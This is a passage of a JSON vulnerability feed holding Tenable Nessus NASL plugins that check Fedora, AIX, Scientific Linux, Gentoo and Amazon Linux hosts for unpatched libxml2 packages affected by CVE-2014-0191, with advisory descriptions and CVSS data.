preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107557\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147322.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb233827\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mingw-libxml2-2.9.2-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:17:42", "description": "Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-08-20T00:00:00", "title": "AIX 6.1 TL 8 : libxml2 (IV62447)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-08-20T00:00:00", "cpe": ["cpe:/o:ibm:aix:6.1"], "id": "AIX_IV62447.NASL", "href": "https://www.tenable.com/plugins/nessus/77257", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libxml2_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77257);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n 
script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 6.1 TL 8 : libxml2 (IV62447)\");\n script_summary(english:\"Check for APAR IV62447\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"04\", patch:\"IV62447s4a\", package:\"bos.rte.control\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.17\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T10:12:28", "description": "Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2015-01-02T00:00:00", "title": "Fedora 21 : mingw-libxml2-2.9.2-1.fc21 (2014-17609)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-01-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:mingw-libxml2"], "id": "FEDORA_2014-17609.NASL", "href": "https://www.tenable.com/plugins/nessus/80327", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17609.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80327);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"FEDORA\", value:\"2014-17609\");\n\n script_name(english:\"Fedora 21 : mingw-libxml2-2.9.2-1.fc21 
(2014-17609)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to libxml2 2.9.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1107557\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?64192413\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"mingw-libxml2-2.9.2-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:48:44", "description": "It was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. 
(CVE-2014-0191)\n\nThe desktop must be restarted (log out, then log back in) for this\nupdate to take effect.", "edition": 14, "published": "2015-03-31T00:00:00", "title": "Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20150330)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2015-03-31T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libxml2-python", "p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libxml2", "p-cpe:/a:fermilab:scientific_linux:libxml2-devel", "p-cpe:/a:fermilab:scientific_linux:libxml2-static", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150330_LIBXML2_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/82468", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82468);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20150330)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libxml2 loaded external parameter entities even\nwhen entity substitution was disabled. A remote attacker able to\nprovide a specially crafted XML file to an application linked against\nlibxml2 could use this flaw to conduct XML External Entity (XXE)\nattacks, possibly resulting in a denial of service or an information\nleak on the system. 
(CVE-2014-0191)\n\nThe desktop must be restarted (log out, then log back in) for this\nupdate to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1503&L=scientific-linux-errata&T=0&P=4139\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?00a8d46f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-debuginfo-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-5.el7_1.2\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-5.el7_1.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:56:24", "description": "The remote host is affected by the vulnerability described in GLSA-201409-08\n(libxml2: Denial of Service)\n\n A vulnerability in the xmlParserHandlePEReference() function of\n parser.c, when expanding entity references, can be exploited to consume\n large amounts of memory and cause a crash or hang.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service via a specially\n crafted XML file containing malicious attributes.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 20, "published": "2014-09-22T00:00:00", "title": "GLSA-201409-08 : libxml2: Denial of Service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-09-22T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:libxml2"], "id": "GENTOO_GLSA-201409-08.NASL", "href": "https://www.tenable.com/plugins/nessus/77776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77776);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_bugtraq_id(67233);\n script_xref(name:\"GLSA\", value:\"201409-08\");\n\n script_name(english:\"GLSA-201409-08 : libxml2: Denial of Service\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-08\n(libxml2: Denial of Service)\n\n A vulnerability in the xmlParserHandlePEReference() function of\n parser.c, when expanding entity references, can be exploited to consume\n large amounts of memory and cause a crash or hang.\n \nImpact :\n\n A remote attacker may be able to cause Denial of Service via a specially\n crafted XML file containing malicious attributes.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201409-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libxml2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/libxml2-2.9.1-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/libxml2\", unaffected:make_list(\"ge 2.9.1-r4\"), vulnerable:make_list(\"lt 2.9.1-r4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-06T09:17:42", "description": "Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "edition": 23, "published": "2014-08-20T00:00:00", "title": "AIX 7.1 TL 3 : libxml2 (IV62450)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2014-08-20T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], 
"id": "AIX_IV62450.NASL", "href": "https://www.tenable.com/plugins/nessus/77260", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libxml2_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77260);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 7.1 TL 3 : libxml2 (IV62450)\");\n script_summary(english:\"Check for APAR IV62450\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Libxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", 
\"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"03\", patch:\"IV62450s3a\", package:\"bos.rte.control\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.15\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:18:48", "description": "It was discovered that libxml2, a library providing support to read,\nmodify and write XML files, incorrectly performs entity substituton in\nthe doctype prolog, even if the application using libxml2 disabled any\nentity substitution. 
A remote attacker could provide a specially\ncrafted XML file that, when processed, would lead to the exhaustion of\nCPU and memory resources or file descriptors.", "edition": 23, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : libxml2 (ALAS-2014-341)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0191"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-python", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-341.NASL", "href": "https://www.tenable.com/plugins/nessus/78284", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-341.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78284);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-0191\");\n script_xref(name:\"ALAS\", value:\"2014-341\");\n\n script_name(english:\"Amazon Linux AMI : libxml2 (ALAS-2014-341)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that libxml2, a library providing support to read,\nmodify and write XML files, incorrectly performs entity substituton in\nthe doctype prolog, even if the application using libxml2 disabled any\nentity substitution. 
A remote attacker could provide a specially\ncrafted XML file that, when processed, would lead to the exhaustion of\nCPU and memory resources or file descriptors.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2014-341.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update libxml2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, 